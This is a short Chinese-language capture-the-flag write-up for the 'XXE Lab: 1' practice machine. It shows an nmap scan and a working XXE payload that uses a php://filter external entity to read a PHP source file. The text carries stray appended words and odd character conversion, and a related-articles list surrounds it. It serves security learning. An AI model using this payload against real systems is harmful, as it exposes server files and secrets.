XXE Lab:1題解
思路
題目已經提示是XXE的專項練習,因此,直接找XXE問題.php
難度
入門html
端口掃描
nmap -sS -A 10.129.10.64
發現HTTP服務、Apache 2.4.27中間件、robots.txt泄漏了目錄和文件
ide
80端口檢查
其中,/xxe/index.php頁面經過xml格式提交用戶名和密碼,因而,此處即爲XXE所在位置。
構造以下payload,讀取頁面源碼,得到一不知是flag仍是flag Hint的內容:code
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]> <root><name>&admin;</name><password>123</password></root>
響應:xml
<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->
因而,陷入矇蔽。。。。等待做者反饋中htm
相關文章
- 1. xxe - lab
- 2. vulnhub-XXE Lab: 1靶機實驗
- 3. XXE Lab滲透測試實戰靶場
- 4. LAB 1
- 5. vulnhub xxe解析
- 6. Wireshark Lab 1
- 7. Sqli Lab(1)
- 8. xxe漏洞學習(1)
- 9. csapp:bomb-lab 解題筆記
- 10. WebGoat 8.0 XXE注入 解題思路
- 更多相關文章...
- • Markdown 標題 - Markdown 教程
- • jQuery Mobile 主題 - jQuery Mobile 教程
- • PHP Ajax 跨域問題最佳解決方案
- • IntelliJ IDEA中SpringBoot properties文件不能自動提示問題解決
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. xxe - lab
- 2. vulnhub-XXE Lab: 1靶機實驗
- 3. XXE Lab滲透測試實戰靶場
- 4. LAB 1
- 5. vulnhub xxe解析
- 6. Wireshark Lab 1
- 7. Sqli Lab(1)
- 8. xxe漏洞學習(1)
- 9. csapp:bomb-lab 解題筆記
- 10. WebGoat 8.0 XXE注入 解題思路